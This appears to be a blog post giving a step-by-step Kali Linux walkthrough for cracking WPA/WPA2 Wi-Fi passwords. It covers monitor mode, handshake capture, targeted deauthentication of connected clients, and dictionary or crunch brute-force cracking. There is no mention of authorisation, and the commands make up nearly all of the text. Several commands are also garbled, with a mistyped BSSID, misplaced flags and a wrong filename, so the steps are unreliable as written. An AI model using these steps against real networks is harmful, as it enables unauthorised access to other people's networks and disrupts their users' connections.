1. Start kali linux and open terminal in kali linux.
2. Type command : airmon-ng
(Check weather your wireless card is avilable and working properly)
3. Type command : airmon-ng start wlan0
(put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)
4. Type command: airodump-ng mon0
(command to listen to the wireless network around you and get details about them.)
5. Type command : airodump-ng –w File name of packet –c Target channel no --bssid BSSID of target name mon0
( eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)
(This means airodump-ng has successfully captured the handshake.
6. Type command: sudo aireplay-ng -0 5–a 11:22:33:44:55:66 mon0
[Send directed DeAuth (attack is more effective when it is targeted) ].
7. Type command: aircrack-ng -w wordlist.lst -b 00:11:22:33:44:55 MTNL.cap
[ -w=The name of the dictionary file
-b=The MAC address of the access point
MTNL.cap=The name of the file that contains the authentication handshake ]
[Note: Default directory for wordlist in linux: /usr/share/wordlists/rockyou.txt.gz]
Steps to attach dictionery
1. cp /usr/share/wordlists/rockyou.txt.gz (copy the file to root directory)
2. gunzIP rockyou.txt.gz (UnzIP the file)
3. mv newrockyou.txt wordlist.lst (rename the file from newrockyou to wordlist)
How to Crack WPA/WPA2 Protected Wi-Fi without dictionary
1. Start kali Linux and open terminal in kali Linux.
2. Type command : airmon-ng
(Check weather your wireless card is avilable and working properly)
3. Type command : airmon-ng start wlan0
(put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)
4. Type command: airodump-ng mon0
(command to listen to the wireless network around you and get details about them.)
5. Type command : airodump-ng –w File name of packet –c Target channel no --bssid BSSID of target name mon0
( eg: airodump-ng –w MTNL –c 3 - -bssid 11:22:33:44:55:66 mon0)
(This means airodump-ng has successfully captured the handshake.
6. Type command: sudo aireplay-ng -0 5–a 11:22:33:44:55:66 mon0
[Send directed DeAuth (attack is more effective when it is targeted) ].
7. Type command:crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid 11:22:33:44:55 :66 -w MTNL.cap
[a).crunch: cruch is used to crack wifi without dictionary as crunch automatically generate the wordlists. working of crunch is similar to brute force attack. It try all possible combination referred by user to crack password.
b). 8 12=It indicates minimum length of password is 8 and maximum length of password is 12.it generate the wordlist starting with 8 character and maximum with 12 character.
c).wordlist contain all lowercase a-z, uppercase A-Z, Number 0-9 as user defined.
d).-bssid : specifies the target MAC address
e). MTNL.cap is the handshake file on which client perform attack.
0 comments:
Post a Comment